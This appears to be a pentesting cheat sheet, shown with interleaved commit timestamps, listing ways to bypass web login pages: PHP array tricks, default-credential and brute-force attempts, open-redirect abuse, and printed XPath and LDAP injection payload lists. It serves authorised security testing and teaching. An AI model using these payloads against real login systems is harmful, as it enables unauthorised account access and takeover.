2021-06-26 15:50:17 +00:00
# Login Bypass
## **Bypass regular login**
If you find a login page, here you can find some techniques to try to bypass it:
2021-10-18 11:21:18 +00:00
* Check for **comments** inside the page (scroll down and to the right?)
2021-06-26 15:50:17 +00:00
* Check if you can **directly access the restricted pages**
2021-10-18 11:21:18 +00:00
* Check to **not send the parameters** (do not send any or only 1)
* Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_
2021-06-26 15:50:17 +00:00
* Check credentials:
2021-11-30 13:50:20 +00:00
* [**Default credentials** ](../../brute-force.md#default-credentials ) ** ** of the technology/platform used
2021-10-18 11:21:18 +00:00
* **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
* Create a dictionary using **Cewl** , **add** the **default** username and password (if there is) and try to brute-force it using all the words as **usernames and password**
* **Brute-force** using a bigger **dictionary (** [**Brute force** ](../../brute-force.md#http-post-form )**)**
2021-06-26 15:50:17 +00:00
### SQL Injection authentication bypass
[Here you can find several tricks to bypass the login via **SQL injections** ](../sql-injection/#authentication-bypass ).
In the following page you can find a **custom list to try to bypass login** via SQL Injections:
2021-10-18 11:21:18 +00:00
{% content-ref url="sql-login-bypass.md" %}
[sql-login-bypass.md ](sql-login-bypass.md )
{% endcontent-ref %}
2021-06-26 15:50:17 +00:00
### No SQL Injection authentication bypass
2021-10-18 11:21:18 +00:00
[Here you can find several tricks to bypass the login via **No SQL Injections.** ](../nosql-injection.md#basic-authentication-bypass )****
2021-06-26 15:50:17 +00:00
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
### XPath Injection authentication bypass
2021-10-18 11:21:18 +00:00
[Here you can find several tricks to bypass the login via **XPath Injection.** ](../xpath-injection.md#authentication-bypass )****
2021-06-26 16:00:08 +00:00
2021-10-18 11:21:18 +00:00
```
2021-06-26 16:00:08 +00:00
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))< 10 or '
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
```
### LDAP Injection authentication bypass
2021-10-18 11:21:18 +00:00
[Here you can find several tricks to bypass the login via **LDAP Injection.** ](../ldap-injection.md#login-bypass )****
2021-06-26 16:00:08 +00:00
2021-10-18 11:21:18 +00:00
```
2021-06-26 16:00:08 +00:00
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(& )
pwd
admin)(!(& (|
pwd))
admin))(|(|
```
2021-06-26 15:50:17 +00:00
2021-06-27 15:43:01 +00:00
### Remember Me
If the page has "**Remember Me**" functionality check how is it implemented and see if you can abuse it to **takeover other accounts** .
### Redirects
2021-10-18 11:21:18 +00:00
Pages usually redirects users after login, check if you can alter that redirect to cause an [**Open Redirect** ](../open-redirect.md ). Maybe you can steal some information (codes, cookies...) if you redirect the user to your web.
2021-06-27 15:43:01 +00:00
## Other Checks
2021-11-30 13:50:20 +00:00
* Check if you can **enumerate usernames** abusing the login functionality.
* Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `<input autocomplete="false"`